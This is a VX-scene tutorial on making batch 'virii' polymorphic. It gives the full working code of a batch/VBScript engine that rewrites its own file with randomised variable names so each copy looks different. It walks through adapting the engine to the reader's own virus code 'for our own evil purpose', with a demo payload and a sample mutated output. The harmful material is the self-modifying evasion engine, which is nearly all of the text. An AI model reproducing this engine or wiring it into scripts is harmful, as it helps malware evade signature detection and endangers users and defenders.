______________________________ | | | TUTORIAL: | | | | P0lYmOrPh!sM In BatCH | | | | by | | | | cOrRuPt G3n3t!x | | | |______________________________| I have searched high and low for a working Polymorphic batch virii and/or self-polymorphic batch engine, but with no success. So the truth hit me, if i want to create a proper polymorphic batch i will have to turn to the younger brethern of batch - Visual Basic Script. Many poly engines have been coded using VBS so off i went and found an excellent working Batch Polymorphic Script by a VXer named Jackie. I would like to thank her for giving me the foundation of a near perfect polymorphic batch script, so lets get started... 1)The Un-edited Batch-jap-poly engine by Jackie: --------------------------------------------- What it does is take the variables she listed in the vbs script (line 25-jav) and then replace them with other random letters, and because the VBS is contained in the batch itself it then also polymorphs, the actual polymorphic engine. This is the closest i've seen to actual polymorphism in a batch virii! If you take the code and paste it to notepad, save its as 'something.bat' then run it and see the original bat and the polymorphed one, they do vary greatly. You can run it as much as you want, it will just keep on changing. Dont cut the set lines, as it will then execute its actual virii code and polymorph, we just want keep changing. it to polymorph. Although when using it on our own virii we need to have set commands as it will polymorph them -----------------------------------------------[Cut Here]--------------------------------------------- set blah = echo set shit = copy set fuck = A set hhh = B set yyy = D %blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% echo randomize>>jjj.vbs echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs echo jc=scriptfile.readall>>jjj.vbs echo jav="blah shit fuck hhh yyy jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs echo for each jv in jsp>>jjj.vbs echo for jlo=1 to int(rnd*6)+2>>jjj.vbs echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs echo next>>jjj.vbs echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs echo next>>jjj.vbs echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs echo scriptfile.writeline jc>>jjj.vbs echo scriptfile.close>>jjj.vbs start jjj.vbs %blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% %yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit% -----------------------------------------------[Cut Here]--------------------------------------------- Now that we have seen the actual virii its time to modify the poly engine here is the actual working poly engine by itself: -----------------------------------------------[Cut Here]--------------------------------------------- echo randomize>>jjj.vbs echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs echo jc=scriptfile.readall>>jjj.vbs echo jav="blah shit fuck hhh yyy jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs echo for each jv in jsp>>jjj.vbs echo for jlo=1 to int(rnd*6)+2>>jjj.vbs echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs echo next>>jjj.vbs echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs echo next>>jjj.vbs echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs echo scriptfile.writeline jc>>jjj.vbs echo scriptfile.close>>jjj.vbs start jjj.vbs -----------------------------------------------[Cut Here]--------------------------------------------- In order to modify the engine for our own evil purpose :) we refer to line 5 (echo jav="blah shit fuck..) we only change blah, shit, fuck, hhh and yyy we change them according to what our set commands are see below for more clarification a it can be confusing for noobs: -----------------------------------------------[Cut Here]---------------------------------------------- set ax=echo set bv=pause set cxv=mkdir set dcv="%UserProfile%\Desktop\%random%" cls @%ax% off %cxv% %dcv% %ax% hello i made a directory on your desktop %bv% echo randomize>>jjj.vbs echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs echo jc=scriptfile.readall>>jjj.vbs echo jav="ax bv cxv dcv jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs echo for each jv in jsp>>jjj.vbs echo for jlo=1 to int(rnd*6)+2>>jjj.vbs echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs echo next>>jjj.vbs echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs echo next>>jjj.vbs echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs echo scriptfile.writeline jc>>jjj.vbs echo scriptfile.close>>jjj.vbs start jjj.vbs -----------------------------------------------[Cut Here]--------------------------------------------- As you can see my set commands are ax, bv, cxv and dcv so then i changed the lines (echo jav="blah shit fuck..) to (echo jav="ax bv cxv dcv). An important note to remember is that using a single variable for set commands is not good especially with this poly engine because when i set a=echo it changed all the 'a's in the file, so rather set it to random letters as to avoid confusion with other letters or words. After running the above script once this is what the new generated polymorphed batch looks like very different from its first variation: -----------------------------------------------[Cut Here]--------------------------------------------- set qnbgqaseqb=echo set pspnvlekmpeg=pause set gteijrmkakkgem=mkdir set cefnmprimvem="%UserProfile%\Desktop\%random%" cls @%qnbgqaseqb% off %gteijrmkakkgem% %cefnmprimvem% %qnbgqaseqb% hello i made a directory on your desktop %pspnvlekmpeg% echo randomize>>ottd.vbs echo set pvrpic=createobject("scripting.filesystemobject")>>ottd.vbs echo set shrsqgotpheq=pvrpic.opentextfile(%0,1)>>ottd.vbs echo ccrqdnshkmldqs=shrsqgotpheq.readall>>ottd.vbs echo vpbaaptfhpip="qnbgqaseqb pspnvlekmpeg gteijrmkakkgem cefnmprimvem qltj ccrqdnshkmldqs vpbaaptfhpip dtsfjcfd dajihtur ftabvconki tlcdukcj pvrpic shrsqgotpheq ottd":dtsfjcfd=split(vpbaaptfhpip," ")>>ottd.vbs echo for each dajihtur in dtsfjcfd>>ottd.vbs echo for ftabvconki=1 to int(rnd*6)+2>>ottd.vbs echo tlcdukcj=tlcdukcj+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>ottd.vbs echo next>>ottd.vbs echo ccrqdnshkmldqs=replace(ccrqdnshkmldqs,dajihtur,tlcdukcj):tlcdukcj="">>ottd.vbs echo next>>ottd.vbs echo set shrsqgotpheq=pvrpic.opentextfile(%0,2,1)>>ottd.vbs echo shrsqgotpheq.writeline ccrqdnshkmldqs>>ottd.vbs echo shrsqgotpheq.close>>ottd.vbs start ottd.vbs -----------------------------------------------[Cut Here]--------------------------------------------- Thats it for now, i hope it helps and if you use this poly engine please remember to give some credit to Jackie as she did make it. If there is any problems with my code or you have a question just e-mail me and i'll gladly help. Remember this is for educational purposes only! and should not be used in an uncontrolled enviroment or be used to do harm. :) [?]Contact Me: ----------- [@]immortalassassin@rocketmail.com